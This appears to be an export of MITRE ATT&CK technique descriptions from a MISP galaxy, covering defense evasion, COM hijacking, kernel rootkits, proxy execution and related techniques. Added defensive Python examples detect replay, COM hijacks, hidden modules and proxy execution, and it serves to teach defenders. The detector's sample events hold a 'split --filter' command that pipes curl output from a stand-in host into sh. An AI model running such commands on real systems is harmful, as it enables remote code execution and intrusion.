https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

https://github.com/hfiref0x/UACME

https://msdn.microsoft.com/en-us/library/ms679687.aspx

https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works

Exploitation for Defense Evasion - T1211

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries (Citation: Salesforce zero-day in facebook phishing attack), evade security logs (Citation: Bypassing CloudTrail in AWS Service Catalog), or deploy hidden infrastructure.(Citation: GhostToken GCP flaw)

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211"

Table 5552. Table References

Links

https://attack.mitre.org/techniques/T1211

https://securitylabs.datadoghq.com/articles/bypass-cloudtrail-aws-service-catalog-and-other/

https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/

https://www.bleepingcomputer.com/news/security/hackers-exploited-salesforce-zero-day-in-facebook-phishing-attack/

Extra Window Memory Injection - T1181

Before creating a window, graphical Windows-based processes must subscribe to or register a window class, which stipulates appearance and behavior (via window procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new window classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181"

Table 5553. Table References

Links

https://attack.mitre.org/techniques/T1181

https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx

https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

Exploitation for Credential Access - T1212

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.

Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don’t properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)

Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)

Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.
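The replay case above is the one that is easiest to show in code: a request that is authenticated only by a MAC over its body remains valid for as long as the key does, so an intercepted copy can be resubmitted. The following is an added example, not code from the MISP galaxy, ATT&CK or any of the cited vendors: a client signs a request with HMAC-SHA256, a vulnerable verifier checks only the MAC, and a hardened verifier binds a nonce and timestamp into the MAC, rejects requests outside a freshness window, and remembers nonces seen inside that window. The shared secret, request bodies, nonces and fixed clock are constructed for the demo; the 30-second window is an assumption.

```python
"""Added example: a replayable HMAC-authenticated request beside a replay-safe
verifier. Secret, requests and clock values are constructed for the demo."""
import hashlib
import hmac
import os
import time

def _canonical(body, nonce, ts):
    # Body, nonce and timestamp are MACed together so none can be altered alone.
    return b"\n".join([body, nonce.encode(), str(ts).encode()])

def make_request(secret, body, nonce=None, ts=None):
    """Client side. A fresh random nonce and the current time are used by default."""
    nonce = nonce if nonce is not None else os.urandom(16).hex()
    ts = ts if ts is not None else int(time.time())
    mac = hmac.new(secret, _canonical(body, nonce, ts), hashlib.sha256).hexdigest()
    return {"body": body, "nonce": nonce, "ts": ts, "mac": mac}

class ReplayableVerifier:
    """Vulnerable form: a valid MAC proves a key holder produced the request,
    but nothing ties it to a time or to a single use."""
    def __init__(self, secret):
        self.secret = secret

    def accept(self, req):
        expected = hmac.new(self.secret, _canonical(req["body"], req["nonce"], req["ts"]),
                            hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, req["mac"])

class ReplaySafeVerifier:
    """Hardened form: freshness window plus a seen-nonce set bounded by that window."""
    def __init__(self, secret, window=30, clock=time.time):
        self.secret = secret
        self.window = window          # assumption: 30 s tolerates ordinary clock skew
        self.clock = clock
        self.seen = {}                # nonce -> ts, only for nonces still inside the window

    def accept(self, req):
        now = self.clock()
        if abs(now - req["ts"]) > self.window:
            return False              # stale: cannot be a fresh request
        expected = hmac.new(self.secret, _canonical(req["body"], req["nonce"], req["ts"]),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, req["mac"]):
            return False              # forged or tampered; checked before touching state
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if req["nonce"] in self.seen:
            return False              # replay of a request already honoured
        self.seen[req["nonce"]] = req["ts"]
        return True

SECRET = b"demo-shared-secret"        # constructed; real keys are provisioned out of band

def demo(now=1_700_000_000):
    """Replay one captured request against both verifiers at a fixed clock."""
    clock = lambda: now
    captured = make_request(SECRET, b"POST /transfer amount=500", nonce="a1b2", ts=now)
    weak, strong = ReplayableVerifier(SECRET), ReplaySafeVerifier(SECRET, clock=clock)
    tampered = dict(captured, body=b"POST /transfer amount=5000")
    stale = make_request(SECRET, b"POST /transfer amount=500", nonce="c3d4", ts=now - 600)
    return {
        "weak_first": weak.accept(captured),     "weak_replay": weak.accept(captured),
        "strong_first": strong.accept(captured), "strong_replay": strong.accept(captured),
        "strong_tampered": strong.accept(tampered), "strong_stale": strong.accept(stale),
    }

if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {'accepted' if outcome else 'rejected'}")
```

The MAC is verified before the nonce set is consulted or updated, so an unauthenticated sender cannot fill the set with arbitrary nonces; and because the window bounds how long a nonce must be remembered, the set cannot grow without limit.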

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212"

Table 5554. Table References

Links

https://adsecurity.org/?p=1515

https://attack.mitre.org/techniques/T1212

https://technet.microsoft.com/en-us/library/security/ms14-068.aspx

https://twitter.com/MsftSecIntel/status/1671579359994343425

https://www.bugcrowd.com/glossary/replay-attack/

https://www.comparitech.com/blog/information-security/what-is-a-replay-attack/

https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/

Component Object Model Hijacking - T1122

The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that is executed in place of legitimate software by hijacking the COM references and relationships as a means of persistence. Hijacking a COM object requires a change in the Windows Registry that replaces the reference to a legitimate system component (typically the InprocServer32 or LocalServer32 value under a CLSID key) with a path the adversary controls. Because the per-user hive HKCU\Software\Classes is consulted before the machine-wide HKLM\Software\Classes, the hijack needs no administrative rights, and it may cause the legitimate component to stop working. When that component is next loaded through normal system operation, the adversary’s code is executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but that are unlikely to break noticeable functionality and cause instability that could lead to detection.
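A practical hunt for this technique is to look at every COM server registered in the per-user hive, since a user-level CLSID entry shadows the machine-wide one. The following Python is an added example, not part of the MISP galaxy or the cited references: it parses a `reg export`-style dump of HKCU\Software\Classes\CLSID, pulls out InprocServer32/LocalServer32 targets and flags those that point outside the protected system directories. The sample registry text, its placeholder CLSIDs and paths are constructed for the example; the "trusted prefix" list is an assumption to be tuned per environment.

```python
import re

# Constructed sample in `reg export` format. The CLSIDs are placeholders, not
# real components; the paths are illustrative.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}]
@="Example Component"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\updater.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000002}\InprocServer32]
@="C:\\Windows\\System32\\shell32.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000003}\LocalServer32]
@="\"C:\\ProgramData\\svc\\host.exe\" /embedding"
"""

# Only the per-user hive is of interest: HKCU entries override HKLM for the same CLSID.
KEY_RE = re.compile(
    r"^\[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\(\{[0-9A-Fa-f-]{36}\})"
    r"\\(InprocServer32|LocalServer32)\]$", re.IGNORECASE)
DEFAULT_RE = re.compile(r'^@="(.*)"$')  # the (Default) value holds the server path

# Assumed set of locations a non-admin cannot normally write to.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _unescape(value):
    # .reg files escape backslashes and quotes with a backslash.
    return re.sub(r"\\(.)", r"\1", value)


def _server_path(value):
    """Strip quoting and any trailing arguments, leaving the executable path."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:value.index('"', 1)]
    return value.split(" ")[0]


def find_hkcu_com_servers(reg_text):
    """Every COM server registered under HKCU, with a flag for user-writable targets."""
    findings = []
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = (key.group(1).upper(), key.group(2))
            continue
        if line.startswith("["):
            current = None  # some other key; stop attributing values to the last match
            continue
        default = DEFAULT_RE.match(line)
        if current and default:
            path = _server_path(_unescape(default.group(1)))
            findings.append({
                "clsid": current[0],
                "server_key": current[1],
                "path": path,
                "user_writable": not path.lower().startswith(TRUSTED_PREFIXES),
            })
    return findings


if __name__ == "__main__":
    for f in find_hkcu_com_servers(SAMPLE_REG):
        flag = "SUSPICIOUS" if f["user_writable"] else "review"
        print(f"{flag:10} {f['clsid']} {f['server_key']} -> {f['path']}")
```

On a live host, `reg export HKCU\Software\Classes\CLSID hkcu_clsid.reg` produces the input (typically UTF-16, so open it with that encoding). Even entries that point at a system path deserve a look, since a per-user registration of a CLSID that also exists under HKLM is rare outside per-user software installs.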

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1122"

Table 5555. Table References

Links

https://attack.mitre.org/techniques/T1122

https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

https://msdn.microsoft.com/library/ms694363.aspx

https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com

Data from Information Repositories - T1213

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213"

Table 5556. Table References

Links

https://attack.mitre.org/techniques/T1213

https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html

https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events

https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2

System Network Connections Discovery - T1421

Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network.

This is typically accomplished by utilizing device APIs to collect information about nearby networks, such as Wi-Fi, Bluetooth, and cellular tower connections. On Android, this can be done by querying the respective APIs:

  • WifiInfo for information about the current Wi-Fi connection, as well as nearby Wi-Fi networks. Querying the WifiInfo API requires the application to hold the ACCESS_FINE_LOCATION permission.

  • BluetoothAdapter for information about Bluetooth devices, which also requires the application to hold several permissions granted by the user at runtime.

  • For Android versions prior to Q, applications can use the TelephonyManager.getNeighboringCellInfo() method. For Q and later, applications can use the TelephonyManager.getAllCellInfo() method. Both methods require the application hold the ACCESS_FINE_LOCATION permission.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1421"

Table 5557. Table References

Links

https://attack.mitre.org/techniques/T1421

Kernel Modules and Extensions - T1215

Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that runs with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)

Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)

Kernel extensions (kexts) are the macOS counterpart of Linux LKMs and are loaded and unloaded with the <code>kextload</code> and <code>kextunload</code> commands. Abuse of kexts has been demonstrated by researchers, including a bypass of the user-approved kernel extension loading introduced in macOS 10.13. (Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken) Examples have been found in the wild. (Citation: Securelist Ventir) Since third-party kexts require explicit user approval on current macOS and Apple has deprecated them in favour of System Extensions, a newly loaded third-party kext (visible with <code>kextstat</code>) is itself a strong signal.
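The self-hiding feature listed above is usually implemented by unlinking the module from the kernel’s module list, which removes it from /proc/modules and therefore from lsmod; the module’s sysfs directory under /sys/module is frequently left behind. The following Python is an added example (not code from the cited rootkit projects or from MISP) that cross-checks the two views: a directory under /sys/module with an initstate file belongs to a loaded loadable module, so any such name missing from /proc/modules is worth examining. The snapshot with the module named "evil" is constructed for the example.

```python
from pathlib import Path

# Constructed snapshot of a host where a module named "evil" unlinked itself from
# the kernel's module list (gone from /proc/modules and lsmod) but its sysfs
# kobject under /sys/module is still present. Names and sizes are illustrative.
PROC_MODULES = """\
ext4 987136 2 - Live 0x0000000000000000
xfs 1658880 0 - Live 0x0000000000000000
"""
SYS_MODULE = {
    "ext4": {"initstate", "refcnt", "sections", "holders"},
    "xfs": {"initstate", "refcnt", "sections", "holders"},
    "evil": {"initstate", "refcnt", "sections", "holders"},
    "printk": {"parameters"},  # built-in code: exposes parameters, no initstate
}


def parse_proc_modules(text):
    """Module names listed in /proc/modules (first column of each line)."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def loaded_from_sysfs(sys_module):
    """Loaded loadable modules expose an initstate file; built-in code does not."""
    return {name for name, entries in sys_module.items() if "initstate" in entries}


def hidden_modules(proc_text, sys_module):
    """Loaded according to sysfs but absent from /proc/modules: the list_del() pattern."""
    return loaded_from_sysfs(sys_module) - parse_proc_modules(proc_text)


def snapshot_live(sys_root="/sys/module", proc_path="/proc/modules"):
    """Read the real files on a Linux host into the same shape as the sample."""
    sys_module = {p.name: {c.name for c in p.iterdir()}
                  for p in Path(sys_root).iterdir() if p.is_dir()}
    return Path(proc_path).read_text(), sys_module


if __name__ == "__main__":
    print("hidden in sample:", hidden_modules(PROC_MODULES, SYS_MODULE))
    try:
        print("hidden on this host:", hidden_modules(*snapshot_live()))
    except OSError:
        print("no /sys/module or /proc/modules here (not Linux?)")
```

An empty result is not a clean bill of health: a rootkit can also delete its sysfs kobject, so this check belongs alongside memory forensics (as in the Phalanx2 reference) rather than in place of it.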

The tag is: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215"

Table 5558. Table References

Links

http://tldp.org/HOWTO/Module-HOWTO/x197.html

http://www.megasecurity.org/papers/Rootkits.pdf

http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html

https://attack.mitre.org/techniques/T1215

https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux

https://github.com/f0rb1dd3n/Reptile

https://github.com/m0nad/Diamorphine

https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/

https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html

https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/

https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Build Image on Host - T1612

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)

An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

The tag is: misp-galaxy:mitre-attack-pattern="Build Image on Host - T1612"

Table 5559. Table References

Links

https://attack.mitre.org/techniques/T1612

https://blog.aquasec.com/malicious-container-image-docker-container-host

https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild

https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

Network Share Connection Removal - T1126

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1126"

Table 5560. Table References

Links

https://attack.mitre.org/techniques/T1126

https://technet.microsoft.com/bb490717.aspx

System Script Proxy Execution - T1216

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)

The tag is: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216"

Table 5561. Table References

Links

https://attack.mitre.org/techniques/T1216

https://github.com/LOLBAS-Project/LOLBAS#criteria

https://github.com/api0cradle/UltimateAppLockerByPassList

System Binary Proxy Execution - T1218

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands: its <code>--filter=COMMAND</code> option hands each output chunk to a shell running COMMAND, so a package-managed coreutils binary ends up spawning <code>sh</code> with attacker-chosen arguments.(Citation: split man page)(Citation: GTFO split)
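Two detection angles follow from the description: the trusted binary is launched with a switch that only makes sense as a command proxy, and the trusted binary becomes the parent of a shell. The following Python is an added example (not MISP, ATT&CK or LOLBAS code) that applies both rules to process-creation events. The JSON event lines are constructed; the switch table is filled in only for the page’s <code>split --filter</code> case and is meant to be extended from LOLBAS and GTFOBins.

```python
import json
import os

# Trusted binaries and the switches that turn them into command proxies. Only the
# page's Linux example (split --filter) is filled in; extend from LOLBAS/GTFOBins.
PROXY_SWITCHES = {"split": ("--filter",)}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Constructed process-creation events (JSON lines as an EDR or auditd pipeline
# might normalise them); pid 101 is benign use of split, 102-104 are abuse.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 101, "ppid": 1, "exe": "/usr/bin/split",
     "args": ["split", "-l", "1000", "big.log"]},
    {"pid": 102, "ppid": 1, "exe": "/usr/bin/split",
     "args": ["split", "--filter=/bin/sh -c id", "/dev/stdin"]},
    {"pid": 103, "ppid": 102, "exe": "/bin/sh",
     "args": ["sh", "-c", "/bin/sh -c id"]},
    {"pid": 104, "ppid": 1, "exe": "/usr/bin/split",
     "args": ["split", "--filter", "curl http://example.invalid | sh", "/dev/null"]},
])


def _has_switch(args, switch):
    # Accept both --filter=CMD and --filter CMD (getopt_long takes either form).
    return any(a == switch or a.startswith(switch + "=") for a in args[1:])


def detect(jsonl):
    """Return (pid, reason) tuples for events matching either rule."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = os.path.basename(e["exe"])
        # Rule 1: a trusted binary invoked with a known proxy switch.
        for switch in PROXY_SWITCHES.get(name, ()):
            if _has_switch(e["args"], switch):
                hits.append((e["pid"], f"{name} invoked with proxy switch {switch}"))
                break
        # Rule 2: a shell whose parent is one of the trusted binaries, which is how
        # split --filter actually runs COMMAND (via sh -c).
        parent = by_pid.get(e["ppid"])
        if parent is not None and name in SHELLS \
                and os.path.basename(parent["exe"]) in PROXY_SWITCHES:
            hits.append((e["pid"], f"{name} spawned by {os.path.basename(parent['exe'])}"))
    return hits


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

Rule 2 is the more robust of the two because it does not depend on knowing every switch; its cost is that the parent–child relation has to be available in the telemetry, which is why process creation logging with parent process fields matters for this technique.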

The tag is: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218"

Table 5562. Table References

Links

https://attack.mitre.org/techniques/T1218

https://github.com/LOLBAS-Project/LOLBAS#criteria

https://gtfobins.github.io/gtfobins/split/

https://man7.org/linux/man-pages/man1/split.1.html

Build social network persona - T1341

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1341).

For attacks incorporating social engineering the utilization of an on-line persona is important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites ([Facebook](https://www.facebook.com), [LinkedIn](https://www.linkedin.com), [Twitter](https://twitter.com), [Google+](https://plus.google.com), etc.). (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341"

Table 5563. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1341

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Remote access tool development - T1351

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1351).

A remote access tool (RAT) is a piece of software that allows a remote user to control a system as if they had physical access to that system. An adversary may utilize existing RATs, modify existing RATs, or create their own RAT. (Citation: ActiveMalwareEnergy)

The tag is: misp-galaxy:mitre-attack-pattern="Remote access tool development - T1351"

Table 5564. Table References

Links

https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/

https://attack.mitre.org/techniques/T1351

Container and Resource Discovery - T1613

Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.

These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.

The tag is: misp-galaxy:mitre-attack-pattern="Container and Resource Discovery - T1613"

Table 5565. Table References

Links

https://attack.mitre.org/techniques/T1613

https://docs.docker.com/engine/api/v1.41/

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

Secure and protect infrastructure - T1317

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1317).

An adversary may secure and protect their infrastructure just as defenders do. This could include the use of VPNs, security software, logging and monitoring, passwords, or other defensive measures. (Citation: KrebsTerracottaVPN)

The tag is: misp-galaxy:mitre-attack-pattern="Secure and protect infrastructure - T1317"

Table 5566. Table References

Links

https://attack.mitre.org/techniques/T1317

Obfuscate or encrypt code - T1319

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1319).

Obfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate or encrypt code - T1319"

Table 5567. Table References

Links

https://attack.mitre.org/techniques/T1319

Elevated Execution with Prompt - T1514

Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as application installation or updating. The API does not validate that the program requesting root privileges comes from a reputable source or that it has not been maliciously modified. Although it is deprecated, it still fully functions in the latest releases of macOS. When the API is called, the user is prompted to enter their credentials, but no checks on the origin or integrity of the calling program are made. The program calling the API may also load world-writable files, which can be modified to perform malicious behavior with elevated privileges. Apple’s supported alternative for privileged helpers is SMJobBless (and, from macOS 13, SMAppService), which installs a code-signed helper through launchd instead of prompting from an unverified process.

Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it’s all broken!)

The tag is: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1514"

Table 5568. Table References

Links

https://attack.mitre.org/techniques/T1514

https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg

https://objective-see.com/blog/blog_0x2A.html

https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8

https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/

Data Encrypted for Impact - T1471

